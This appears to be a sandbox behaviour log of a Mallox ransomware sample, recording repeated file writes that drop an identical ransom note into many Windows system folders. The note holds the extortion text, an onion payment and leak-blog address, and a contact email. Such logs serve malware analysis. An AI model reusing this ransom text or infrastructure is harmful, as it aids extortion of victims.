file_handle: 0x000003d4 filepath: C:\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000280 filepath: C:\$Recycle.Bin\S-1-5-21-3832866432-4053218753-3017428901-1001\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002e4 filepath: C:\$Recycle.Bin\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000324 filepath: C:\Config.Msi\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000001ac filepath: C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000001ac filepath: C:\ProgramData\Microsoft\Assistance\Client\1.0\ko-KR\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000001ac filepath: C:\ProgramData\Microsoft\Assistance\Client\1.0\ko-KR_en-US\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000260 filepath: C:\ProgramData\Microsoft\Assistance\Client\1.0\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000330 filepath: C:\ProgramData\Microsoft\Assistance\Client\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000330 filepath: C:\ProgramData\Microsoft\Assistance\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000330 filepath: C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000274 filepath: C:\ProgramData\Microsoft\Crypto\DSS\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000324 filepath: C:\ProgramData\Microsoft\Crypto\Keys\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000288 filepath: C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000288 filepath: C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000001ac filepath: C:\ProgramData\Microsoft\Crypto\RSA\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x0000031c filepath: C:\ProgramData\Microsoft\Crypto\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000294 filepath: C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000294 filepath: C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000260 filepath: C:\ProgramData\Microsoft\Device Stage\Device\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x000002c4 filepath: C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000268 filepath: C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ko-KR\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000280 filepath: C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x0000028c filepath: C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000330 filepath: C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ko-KR\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000330 filepath: C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x00000280 filepath: C:\ProgramData\Microsoft\Device Stage\Task\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x0000031c filepath: C:\ProgramData\Microsoft\Device Stage\FILE RECOVERY.txt	1
NtWriteFile March 11, 2023, 10:28 a.m.	buffer: Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: DCF98CC8BBE496C51210B008 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. offset: 0 file_handle: 0x0000031c filepath: C:\ProgramData\Microsoft\DeviceSync\FILE RECOVERY.txt	1
